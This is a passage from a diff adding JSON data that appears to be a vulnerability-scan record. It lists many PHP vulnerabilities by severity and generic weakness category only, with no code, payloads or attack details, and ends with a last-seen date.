Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Control of Generation of Code ('Code Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP DEPRECATED: Code Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Data Processing Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Data Processing Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Data Processing Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Link Resolution Before File Access ('Link Following') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Control of Generation of Code ('Code Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Access Control Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Missing Release of Resource after Effective Lifetime Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Uncontrolled Resource Consumption Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Link Resolution Before File Access ('Link Following') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Incorrect Conversion between Numeric Types Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Loop with Unreachable Exit Condition ('Infinite Loop') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Uncontrolled Resource Consumption Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Deserialization of Untrusted Data Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Check for Unusual or Exceptional Conditions Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Control of Generation of Code ('Code Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Deserialization of Untrusted Data Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Allocation of Resources Without Limits or Throttling Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Double Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Deserialization of Untrusted Data Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Server-Side Request Forgery (SSRF) Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Access Control Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Numeric Errors Vulnerability" + } + ], + "LastSeenDate": "25/06/2021 01:52 